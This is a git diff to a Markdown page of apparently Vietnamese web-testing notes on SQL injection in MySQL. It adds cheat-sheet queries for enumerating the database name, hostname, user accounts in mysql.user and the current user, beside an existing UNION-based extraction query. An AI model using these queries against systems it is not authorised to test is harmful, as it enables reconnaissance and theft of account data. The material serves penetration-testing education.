--- a/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.2.Testing_for_MySQL.md
+++ b/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.2.Testing_for_MySQL.md
@@ -62,6 +62,18 @@ CONCAT('hi','hello')
 SELECT @@version
 ```
 
+# Current Database
+
+```sql
+SELECT database()
+```
+
+# Hostname 
+
+```sql
+SELECT @@hostname;
+```
+
 # Database contents
 
 ```sql
@@ -145,3 +157,17 @@ hoặc
 select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;
 -- dbname ở đây chỉ là đặt tên cho kết quả truy 
 ```
+
+# List Users
+
+```sql
+SELECT user FROM mysql.user; — priv
+```
+
+# Current User
+
+```sql
+SELECT user();
+SELECT system_user();
+```
+
